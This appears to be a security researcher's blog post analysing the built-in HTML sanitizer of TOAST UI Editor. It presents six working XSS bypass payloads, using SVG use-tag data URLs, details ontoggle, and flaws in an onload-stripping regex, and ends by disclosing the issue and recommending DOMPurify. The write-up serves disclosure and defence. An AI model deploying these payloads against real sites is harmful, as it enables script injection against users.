TOAST UI Editor is a GFM Markdown and WYSIWYG editor, it's also has its own Markdown parser and previewer, no third-party library is needed.
TOAST UI Editor provides the viewer in case you want to show Markdown content without loading the Editor, the Viewer is much lighter than the Editor. A sample code to use the Viewer:
import Viewer from '@toast-ui/editor/dist/toastui-editor-viewer';
import '@toast-ui/editor/dist/toastui-editor-viewer.css';
const viewer = new Viewer({
el: document.querySelector('#viewer'),
height: '600px',
initialValue: `# Markdown`
});
It's a good habit for me to wonder if the Markdown parser has a XSS vulnerability, so I started to review the code of it.
0x01 How Markdown compiled to HTML
In real world, the most common 2 ways to solve the XSS in a Markdown parser are:
- HTML entity encode the text and attribute while compiling every part of the Markdown
- Do nothing while parsing and compiling, and use a sanitizer after the HTML is generated
TOAST UI Editor use the latter approach.
The security of latter approach depends on the HTML sanitizer, so I am intersted in the HTML sanitizer. After I read the documents, I notice that if no user-provided HTML santizer is given, built-in one is used: https://github.com/nhn/tui.editor/blob/48a01f5/apps/editor/src/sanitizer/htmlSanitizer.ts
Let's see the sanitizer steps:
- Remove the HTML comments and the
onload
attributes. - Create a new DOM tree and assign the user-input data to its
innerHTML
. - Walk the DOM tree, remove the tag within the denylist, such as
<script>
,<iframe>
,<form>
, etc. - Walk the element attributes, remove all the attributes that are not startswith the keywords in the allowlist.
- For attribute whose name matches the
/href|src|background/i
, do an addition check. - Get a clean DOM tree the return it's
innerHTML
.
0x02 User interaction bypass was found
No on*
attributes are in the allowlist, so most common XSS payloads are less usable. Secondly, payloads without javascript events are not effectual too because of the denylist, such as:
<script>alert(1)</script>
<iframe src="javascript:alert(1)">
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
<form><input type=submit formaction=javascript:alert(1) value=XSS>
<form><button formaction=javascript:alert(1)>XSS
<form action=javascript:alert(1)><input type=submit value=XSS>
Anchor tag with a Javascript URL scheme, <a href="javascript:alert(1)">XSS</a>
is a common payload that could bypass the allowlist, but in this HTML sanitizer, a strict check is around it:
const reXSSAttr = /href|src|background/i;
const reXSSAttrValue = /((java|vb|live)script|x):/i;
const reWhitespace = /[ \t\r\n]/g;
function isXSSAttribute(attrName: string, attrValue: string) {
return attrName.match(reXSSAttr) && attrValue.replace(reWhitespace, '').match(reXSSAttrValue);
}
Because the sanitizer run after the DOM parsing, so HTML encode doesn't work, such as:
<a href="javasc ript:alert(1)">XSS</a>
<a href="javasc	ript:alert(1)">XSS</a>
<a href="javascript:alert(1)">XSS</a>
I found that <svg>
is not in the denylist, so I was trying some tricks about it.
This one is not useable since the keyword javascript:
was checked, I describe it before:
<svg><a xlink:href="javascript:alert(1)"><text x="100" y="100">XSS</text></a>
The moment, I think about the <use>
tag, its role is to reference a svg element like that:
<!-- Two circle is shown -->
<svg>
<circle id="myCircle" cx="5" cy="5" r="4" stroke="blue"/>
<use href="#myCircle"></use>
</svg>
Unlike <a xlink:href>
, <svg href>
doesn't support Javascript URL scheme, but the data:
URL scheme is supported.
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
It is a clean payload, but the javascript:
keyword is still appeared in the href value.
Reference to RFC2397, a base64 proccess is allowed here to bypass the keyword check:
<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyAKICAgIHhtbG5zOnhsaW5rPSdodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rJyB3aWR0aD0nMTAwJyBoZWlnaHQ9JzEwMCc+PGEgeGxpbms6aHJlZj0namF2YXNjcmlwdDphbGVydCgxKSc+PHJlY3QgeD0nMCcgeT0nMCcgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnIC8+PC9hPjwvc3ZnPg#x"></use></svg>
Great, the first payload which can perform the XSS attack in Tui Editor.
Similarly, charset is allowed in the data URL scheme. ISO-2022-JP
is a magical charset, that usually occurs in the article about XSS auditor. For example, \x1B\x28\x42
will be ignored when charset equals to ISO-2022-JP
, so this trick is useful for me:
<svg><use href="data:image/svg+xml;charset=ISO-2022-JP,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javas%1B%28Bcript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
The second payload which can perform the XSS attach in Tui Editor.
Though I found two ways to bypass the HTML sanitizer, but both of them are user interaction, not the best payloads in real world.
0x02 No User interaction bypass was found
After search the history commits of the Tui Editor, I noticed that they had fixed a XSS vulnerability in last month:
They added a replacement before the sanitizer, which remove the onload=
from the user input.
But I couldn't understand why were they do that since onload
was not in the allowlist, until I found a testcase in the code:
<svg><svg onload=alert(1)>
What a simple payload, but it did bypass the earlier HTML sanitizer.
How does it work?
In my option, I think it works due to the race condition. The javascript is executed after innerHTML
assignment, before walking the allowlist and denylist.
So how to find another payloads like that, the payload should has the two condition:
- A Javascript event should be triggerd after
innerHTML
assignment without DOM is write to page - A Javascript event should be triggerd after
innerHTML
assignment immediately
Lot's of payloads satisfies the first condition, such as <img src=1 onerror=alert(1)>
:
const root = document.createElement('div');
root.innerHTML = `<img src=1 onerror=alert(1)>`
In contrast, the two Payloads <svg onload=alert(1)>
, <script>alert(1)</script>
don't satisfy this requirement.
The second condition is even more tricky, to the point that while I know some payloads can be exploited, I'm not sure why it can be exploited.
The <img>
Payload can't satisfy the second condition because it triggers onerror when src image fails to load, and there are some IO operations that take longer, so it certainly can't be done before onerror is removed.
The following two Payloads can satisfy the both conditions.
<svg><svg onload=alert(1)>
<details open ontoggle=alert(1)>
The first one is fixed before, the <details>
is the third payload which can perform the XSS attach in Tui Editor, and no user interaction is required.
0x03 Found 3 patches bypasses
Let's review the patches for double <svg>
payloads:
export const TAG_NAME = '[A-Za-z][A-Za-z0-9-]*';
const reXSSOnload = new RegExp(`(<${TAG_NAME}[^>]*)(onload\\s*=)`, 'ig');
export function sanitizeHTML(html: string) {
const root = document.createElement('div');
if (isString(html)) {
html = html.replace(reComment, '').replace(reXSSOnload, '$1');
root.innerHTML = html;
}
// ...
}
Remove the data that matches the regexp (<[A-Za-z][A-Za-z0-9-]*[^>]*)(onload\\s*=)
.
This patch is bad, there are 3 problems I found.
greedy mode problem
By default, the regex engine will match as many characters as possible that satisfy the current pattern, so if there are two onload=
here, then this [^>]*
will match the second one and remove it, while the first onload=
will be kept.
The payload is:
<svg><svg onload=alert(1) onload=alert(2)>
lazy mode problem
If I change the greedy mode to lazy mode, is it ok to defense the XSS attack?
(<[A-Za-z][A-Za-z0-9-]*[^>]*?)(onload\\s*=)
Looking at this regular, it is divided into two groups, (<[A-Za-z][A-Za-z0-9-]*[^>]*?)
and (onload\\s*=)
, when the user input matches, the second group will be deleted and remain the first group $1
.
So, even if we change to lazy mode, the first onload=
will be deleted and the second onload=
will still be kept:
<p><svg><svg onload=onload=alert(1)></svg></svg></p>
>
problem
Looking at the [^>]*
, the author is going to search onload=
until the tag closes, but there's actually a bug here: there can be a character >
in an HTML attribute that is more than just a tag delimiter.
Then, if this regular matches a >
in the HTML attribute, it will stop checking, so that the onload=
can be retained.
<svg><svg x=">" onload=alert(1)>
0x04 Summary
In this article, I talked about 6 methods to bypass the built-in HTML sanitizer of TOAST UI Editor, 2 methods are based on <svg><use>
, which requires the user interaction, 4 methods are the bypasses of the patches that are fixed one month ago.
Among them, <svg><svg onload=alert(1)>
is a magical payload I am not able to confirm it's principle until today.
When I research these vulnerabilities, I publish a XSS challenge in my friend circle, then @ZeddYu_Lu put it to Twitter: https://twitter.com/ZeddYu_Lu/status/1421091362410156032, it becomes popular.
Also, I create an issue about these XSS vulnerabilities: https://github.com/nhn/tui.editor/issues/1717, no patch yet.
If you are a user of TOAST UI Editor, I suggest that you are better to use a well-tested third-party HTML sanitizer like https://github.com/cure53/DOMPurify to replace the built-in HTML sanitizer.